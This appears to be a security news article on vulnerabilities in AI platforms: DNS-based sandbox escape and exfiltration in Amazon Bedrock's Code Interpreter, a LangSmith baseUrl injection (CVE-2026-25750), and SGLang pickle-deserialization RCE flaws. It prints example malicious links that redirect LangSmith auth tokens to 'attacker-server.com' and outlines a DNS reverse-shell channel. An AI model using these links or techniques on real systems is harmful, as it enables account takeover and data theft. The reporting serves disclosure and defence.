Cybersecurity researchers have uncovered multiple security weaknesses in several artificial intelligence platforms that could allow attackers to steal sensitive data or execute malicious commands. The issues affect services associated with Amazon, LangSmith, and SGLang.
According to recent research, attackers can exploit these weaknesses to extract confidential information, hijack accounts, and potentially gain remote code execution access in certain AI environments.
DNS-Based Technique Bypasses Isolation in Amazon Bedrock
Security researchers revealed a new attack technique that abuses the Domain Name System (DNS) to bypass network isolation inside AI code execution environments.
The report, published by BeyondTrust, shows that the sandbox environment used in Amazon Bedrock AgentCore Code Interpreter allows outbound DNS requests even when network access is restricted.
This behavior creates an opportunity for attackers to establish hidden communication channels. Through DNS queries, threat actors may be able to create command and control communication and secretly transfer sensitive data outside the environment.
The vulnerability does not currently have an official CVE identifier but has been assigned a severity score of 7.5 on the CVSS scale.
The Code Interpreter service was introduced in August 2025 to allow AI agents to run code safely within isolated sandbox environments while preventing direct communication with external systems.
However, the discovery indicates that DNS requests can still be used as a communication pathway despite the intended network restrictions.
Potential Attack Scenario
Researchers demonstrated how attackers could exploit this functionality by establishing two way communication over DNS.
Using this method, an attacker could:
- Create an interactive reverse shell
- Execute remote commands
- Transfer sensitive information through DNS queries
- Access protected cloud resources if permissions allow it
For example, if the service’s IAM role has access to AWS resources such as S3 storage buckets, attackers may retrieve sensitive information stored in those environments.
The DNS channel could also be used to deliver additional payloads. Commands could be stored within DNS records and executed by the interpreter, with results sent back using DNS subdomain queries.
Researchers warned that misconfigured IAM roles could make the situation worse. If the service is assigned excessive permissions, attackers may gain access to confidential infrastructure components.
BeyondTrust emphasized that DNS communication can undermine the isolation guarantees normally expected from sandboxed code execution environments.
Such attacks could lead to data breaches, infrastructure disruption, or exposure of sensitive customer information.
Amazon’s Response and Recommended Mitigation
After receiving responsible disclosure in September 2025, Amazon concluded that the behavior represents intended functionality rather than a software defect.
The company recommends organizations switch from sandbox mode to VPC mode to achieve stronger network isolation.
Amazon also advises customers to implement DNS firewall protections to monitor and filter outgoing DNS requests.
Security experts recommend several defensive steps including:
- Migrating critical workloads to VPC mode
- Deploying DNS firewall monitoring
- Restricting IAM role permissions
- Applying the principle of least privilege
Jason Soroko, a senior fellow at Sectigo, stressed that administrators should review all Code Interpreter deployments and migrate sensitive workloads immediately.
LangSmith Vulnerability Could Lead to Account Takeovers
Another serious security flaw has been identified in LangSmith, a development and observability platform used for monitoring AI applications.
Security researchers from Miggo Security discovered a vulnerability tracked as CVE-2026-25750 with a CVSS score of 8.5.
The flaw is caused by improper validation of a URL parameter called baseUrl, which enables URL parameter injection attacks.
By manipulating this parameter, attackers can trick users into sending authentication information to malicious servers.
Attackers may distribute specially crafted links such as:
Cloud deployment
smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
Self hosted deployment
<LangSmith_domain_of_the_customer>/studio/?baseUrl=https://attacker-server.com
If a logged in user clicks the malicious link, sensitive tokens including bearer tokens, user IDs, and workspace identifiers may be leaked.
With these credentials, attackers could gain unauthorized access to internal data including:
- AI trace histories
- Internal SQL queries
- Customer CRM records
- Proprietary application source code
The vulnerability has been fixed in LangSmith version 0.12.71, released in December 2025.
Researchers emphasized that AI observability platforms are becoming essential infrastructure. Because these systems interact deeply with internal tools and data sources, security weaknesses may expose highly sensitive organizational data.
Critical Remote Code Execution Risks in SGLang
Additional vulnerabilities were discovered in SGLang, an open source framework used to deploy large language models and multimodal AI systems.
The issues were identified by Orca Security researcher Igor Stepansky and involve unsafe use of Python pickle deserialization.
Improper deserialization can allow attackers to execute malicious code remotely.
Three vulnerabilities have been reported:
CVE-2026-3059 (CVSS 9.8)
Unauthenticated remote code execution through the ZeroMQ broker in the multimodal generation system.
CVE-2026-3060 (CVSS 9.8)
Remote code execution through the encoder parallel disaggregation system using untrusted serialized data.
CVE-2026-3989 (CVSS 7.8)
Insecure deserialization in the replay_request_dump utility through unsafe pickle file handling.
These flaws arise from the use of functions such as pickle.loads() and pickle.load() without proper validation.
The vulnerabilities may allow attackers to send malicious serialized files to the system, which are then processed and executed.
A coordinated advisory from the CERT Coordination Center confirmed that exploitation is possible if the vulnerable modules are enabled and accessible over the network.
If attackers know the TCP port used by the ZeroMQ broker, they could send malicious requests that trigger deserialization and execute arbitrary commands.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
